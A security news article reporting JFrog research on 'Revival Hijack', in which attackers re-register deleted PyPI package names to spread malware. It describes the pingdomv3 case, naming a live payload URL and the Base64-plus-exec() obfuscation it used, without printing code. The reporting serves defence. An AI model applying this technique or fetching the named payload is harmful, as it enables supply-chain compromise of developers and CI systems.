Hackers often target PyPI packages due to their extensive user base and open-source nature. This helps threat actors in distributing malicious code within an open-source ecosystem.
The decentralized nature of PyPI makes it challenging for security experts to monitor and detect malicious activities, which allows threat actors to exploit the trust users place in popular packages.
Researchers at JFrog recently identified a new attack that hijacks 22,000 PyPI packages, and the new attack is dubbed, “Revival Hijack.”
Technical analysis
The “Revival Hijack” attack vector possibly results in hundreds of thousands of such increments depending on the motive.
This technique applies to the malicious scraping of abandoned package names for malware dissemination. Researchers noticed this in action with the “pingdomv3” package hijack.
Several steps worked to prevent the loss of significant system resources including better surveillance and quicker response to security concerns of the system.
Revival Hijacking conveys a sophisticated attack vector in open-source software repositories, particularly PyPI.
Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial
Unlike typosquatting, which exploits user input errors, this technique takes advantage of the package names being available immediately after deletion.
Threat actors can register these names and inject harmful code under previously trusted identities.
This poses significant risks, especially in CI/CD pipelines and for users employing automated updates. Besides this, the analysis identified over 22,000 vulnerable packages with significant download histories.
To demonstrate the attack’s feasibility, researchers created a “security_holding” account to safely reserve the high-risk packages, and with the help of this, approx 200,000 downloads were accumulated in just three months.
Here below we have mentioned all the existing safeguards of PyPI:-
- Normalized name matching (using SQL regex operations to standardize package names).
- Similarity checks, prove inadequate against this threat.
The ‘pingdomv3’ package is one of the real-world examples that shows the strength of the attack.
The original package was abandoned in March 2024 and it’s been swiftly replaced by a malicious version targeting Jenkins CI environments.
To deliver a payload from an external URL (https://yyds.yyzs.workers.dev/meta/statistics), threat actors employed Base64 obfuscation and dynamic code execution (via Python’s exec() function).
This technique evades the simple static analysis and allows the execution of targeted attacks based on IP ranges or other environmental factors.
However, the complete scenario highlights the need for enhanced security measures in package management systems.
What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!